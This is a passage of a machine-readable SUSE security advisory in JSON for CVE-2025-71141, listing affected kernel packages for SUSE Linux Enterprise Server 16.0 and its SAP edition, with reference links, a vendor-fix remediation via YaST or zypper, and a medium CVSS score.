"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
